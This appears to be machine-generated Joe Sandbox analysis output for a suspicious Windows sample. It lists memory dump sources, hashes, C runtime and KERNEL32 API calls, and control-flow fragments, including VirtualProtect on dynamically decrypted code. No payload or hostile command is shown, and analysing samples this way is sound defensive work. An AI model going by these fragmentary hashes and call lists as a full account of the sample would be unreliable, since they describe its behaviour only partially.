                                                      • Instruction ID: 74c1b90a01db230de662c72faab58802bb742d928f34651097fec506a9751401
                                                      • Opcode Fuzzy Hash: 519d71d31dfe2b71d65c539f7253ce4d0ce1a0c509a5eaaf561cac07154b4855
                                                      • Instruction Fuzzy Hash: 15717072A9155347E39CCF5CECD17763713DBC5351F49C23ACA025B6EAC938A922C688
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1460105468.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_2210000_NaE.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1460105468.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_2210000_NaE.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                      • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,022818D8), ref: 004170C5
                                                      • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                      • _malloc.LIBCMT ref: 0041718A
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                      • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                      • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                      • _malloc.LIBCMT ref: 0041724C
                                                      • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                      • __freea.LIBCMT ref: 004172A4
                                                      • __freea.LIBCMT ref: 004172AD
                                                      • ___ansicp.LIBCMT ref: 004172DE
                                                      • ___convertcp.LIBCMT ref: 00417309
                                                      • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                      • _malloc.LIBCMT ref: 00417362
                                                      • _memset.LIBCMT ref: 00417384
                                                      • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                      • ___convertcp.LIBCMT ref: 004173BA
                                                      • __freea.LIBCMT ref: 004173CF
                                                      • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                      • String ID:
                                                      • API String ID: 3809854901-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • _malloc.LIBCMT ref: 004057DE
                                                        • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                        • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                        • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                      • _malloc.LIBCMT ref: 00405842
                                                      • _malloc.LIBCMT ref: 00405906
                                                      • _malloc.LIBCMT ref: 00405930
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: _malloc$AllocateHeap
                                                      • String ID: 1.2.3
                                                      • API String ID: 680241177-2310465506
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                      • String ID:
                                                      • API String ID: 3886058894-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __lock_file.LIBCMT ref: 0040C6C8
                                                      • __fileno.LIBCMT ref: 0040C6D6
                                                      • __fileno.LIBCMT ref: 0040C6E2
                                                      • __fileno.LIBCMT ref: 0040C6EE
                                                      • __fileno.LIBCMT ref: 0040C6FE
                                                        • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                        • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                      • String ID: 'B
                                                      • API String ID: 2805327698-2787509829
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __getptd.LIBCMT ref: 00414744
                                                        • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                        • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                      • __getptd.LIBCMT ref: 0041475B
                                                      • __amsg_exit.LIBCMT ref: 00414769
                                                      • __lock.LIBCMT ref: 00414779
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                      • String ID: @.B
                                                      • API String ID: 3521780317-470711618
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __getptd.LIBCMT ref: 00413FD8
                                                        • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                        • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                      • __amsg_exit.LIBCMT ref: 00413FF8
                                                      • __lock.LIBCMT ref: 00414008
                                                      • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                      • InterlockedIncrement.KERNEL32(02281670), ref: 00414050
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                      • String ID:
                                                      • API String ID: 4271482742-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: __calloc_crt
                                                      • String ID: P$B$`$B
                                                      • API String ID: 3494438863-235554963
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: AddressHandleModuleProc
                                                      • String ID: IsProcessorFeaturePresent$KERNEL32
                                                      • API String ID: 1646373207-3105848591
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • ___addlocaleref.LIBCMT ref: 0041470C
                                                        • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(00000001), ref: 004145E4
                                                        • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 004145F1
                                                        • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 004145FE
                                                        • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 0041460B
                                                        • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 00414618
                                                        • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 00414634
                                                        • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 00414644
                                                        • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 0041465A
                                                      • ___removelocaleref.LIBCMT ref: 00414717
                                                        • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 0041467B
                                                        • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 00414688
                                                        • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 00414695
                                                        • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146A2
                                                        • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146AF
                                                        • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146CB
                                                        • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(00000000), ref: 004146DB
                                                        • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146F1
                                                      • ___freetlocinfo.LIBCMT ref: 0041472B
                                                        • Part of subcall function 00414489: ___free_lconv_mon.LIBCMT ref: 004144CF
                                                        • Part of subcall function 00414489: ___free_lconv_num.LIBCMT ref: 004144F0
                                                        • Part of subcall function 00414489: ___free_lc_time.LIBCMT ref: 00414575
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: Interlocked$DecrementIncrement$___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
                                                      • String ID: @.B
                                                      • API String ID: 467427115-470711618
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __fileno.LIBCMT ref: 0040C77C
                                                      • __locking.LIBCMT ref: 0040C791
                                                        • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                        • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                      • String ID:
                                                      • API String ID: 2395185920-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: _fseek_malloc_memset
                                                      • String ID:
                                                      • API String ID: 208892515-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __flush.LIBCMT ref: 0040BB6E
                                                      • __fileno.LIBCMT ref: 0040BB8E
                                                      • __locking.LIBCMT ref: 0040BB95
                                                      • __flsbuf.LIBCMT ref: 0040BBC0
                                                        • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                        • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                      • String ID:
                                                      • API String ID: 3240763771-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                      • __isleadbyte_l.LIBCMT ref: 00415307
                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                      • String ID:
                                                      • API String ID: 3058430110-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                      • String ID:
                                                      • API String ID: 3016257755-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage:12.8%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:14
                                                      Total number of Limit Nodes:0
                                                      execution_graph (rendering omitted): 14 nodes spanning 2220c10 to 22295b9; the path through 222266f and 2229378 reaches VirtualProtect, and the node at 2229548 reaches FindCloseChangeNotification

                                                      Control-flow Graph (executed/not-executed rendering omitted): basic blocks 2229378-2229427; the entry block 2229378-22293f9 calls VirtualProtect
                                                      APIs
                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 022293EC
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2646374393.0000000002220000.00000040.00000800.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_2220000_audio.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph (executed/not-executed rendering omitted): basic blocks 2229548-22295e5; the entry block 2229548-22295b7 calls FindCloseChangeNotification
                                                      APIs
                                                      • FindCloseChangeNotification.KERNELBASE ref: 022295AA
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2646374393.0000000002220000.00000040.00000800.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_2220000_audio.jbxd
                                                      Similarity
                                                      • API ID: ChangeCloseFindNotification
                                                      • String ID:
                                                      • API String ID: 2591292051-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph (executed/not-executed rendering omitted): basic blocks 20bd5c4-20bd6a2, no API calls
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2646086953.00000000020BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 020BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_20bd000_audio.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph (executed/not-executed rendering omitted): basic blocks 20bd4d8-20bd5b6, no API calls
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2646086953.00000000020BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 020BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_20bd000_audio.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 442970c59819dc0c2b369e52d0865887290d75d29890c7724bb35e71d294f114
                                                      • Instruction ID: 87f509c0585ae35c5e3bf5af9fef6b574c5e9cafaeca6e89aba113d8d6be3a41
                                                      • Opcode Fuzzy Hash: 442970c59819dc0c2b369e52d0865887290d75d29890c7724bb35e71d294f114
                                                      • Instruction Fuzzy Hash: B52137B1504300DFDB26DF10D9C0B6AFBA5FF88318F208169E8090B256C336D856DBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph (basic-block address ranges and edges):
                                                      control_flow_graph 260 20bd4d3-20bd4ea 261 20bd57e-20bd585 260->261 262 20bd4f0 260->262 263 20bd4f2-20bd4fe 261->263 262->263 265 20bd58a-20bd58f 263->265 266 20bd504-20bd526 263->266 265->266 267 20bd528-20bd546 266->267 268 20bd594-20bd5a9 266->268 271 20bd54e-20bd55e 267->271 272 20bd560-20bd568 268->272 271->272 273 20bd5b6 271->273 274 20bd5ab-20bd5b4 272->274 275 20bd56a-20bd57b 272->275 274->275
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2646086953.00000000020BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 020BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_20bd000_audio.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6a2a4232aa45621a27d7c7c5d03b7cad02ec4d38aa47425da21248f8a1ed116c
                                                      • Instruction ID: ee20f13ae439f932b8e653e8074830cbef8426a3566365dddd78ca8f4738404a
                                                      • Opcode Fuzzy Hash: 6a2a4232aa45621a27d7c7c5d03b7cad02ec4d38aa47425da21248f8a1ed116c
                                                      • Instruction Fuzzy Hash: 6411AF76504340CFCB16CF10D5C4B56FFB1FB84318F2486A9D8090B656C33AD45ADBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph (basic-block address ranges and edges):
                                                      control_flow_graph 277 20bd5bf-20bd5d6 278 20bd66a-20bd671 277->278 279 20bd5dc 277->279 280 20bd5de-20bd5ea 278->280 279->280 282 20bd5f0-20bd612 280->282 283 20bd676-20bd67b 280->283 284 20bd680-20bd695 282->284 285 20bd614-20bd632 282->285 283->282 289 20bd64c-20bd654 284->289 288 20bd63a-20bd64a 285->288 288->289 290 20bd6a2 288->290 291 20bd697-20bd6a0 289->291 292 20bd656-20bd667 289->292 291->292
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2646086953.00000000020BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 020BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_20bd000_audio.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6a2a4232aa45621a27d7c7c5d03b7cad02ec4d38aa47425da21248f8a1ed116c
                                                      • Instruction ID: d12245152d4b259423bd1362896d37a4069a5d78b5705fa647c7aa9d151f252f
                                                      • Opcode Fuzzy Hash: 6a2a4232aa45621a27d7c7c5d03b7cad02ec4d38aa47425da21248f8a1ed116c
                                                      • Instruction Fuzzy Hash: 3F11AF76504280CFCB16CF10D5C4B56FFB1FB88314F24C6A9D8494B656C33AD45ADBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph (basic-block address ranges and edges):
                                                      control_flow_graph 330 20bd006-20bd03d 333 20bd03f-20bd04a 330->333 334 20bd08d-20bd095 330->334 335 20bd04c-20bd05a 333->335 336 20bd082-20bd089 333->336 334->333 339 20bd060 335->339 336->335 340 20bd08b 336->340 341 20bd063-20bd06b 339->341 340->341 342 20bd07b-20bd080 341->342 343 20bd06d-20bd075 341->343 342->343
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2646086953.00000000020BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 020BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_20bd000_audio.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f59aa8b81272d92ac84ed09b8e6cbdc3bf3b697ea4c40612bb3b36a951d7ae65
                                                      • Instruction ID: ab932e743a8c203fa38fb2df442d65cd72d9cfd5120593ca956a4b30edbde001
                                                      • Opcode Fuzzy Hash: f59aa8b81272d92ac84ed09b8e6cbdc3bf3b697ea4c40612bb3b36a951d7ae65
                                                      • Instruction Fuzzy Hash: 5D01697140D3809FD7238B258C84792BFE8DF43224F0984CBE9888F1A3C2695C44DB72
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2646086953.00000000020BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 020BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_20bd000_audio.jbxd
                                                      Similarity
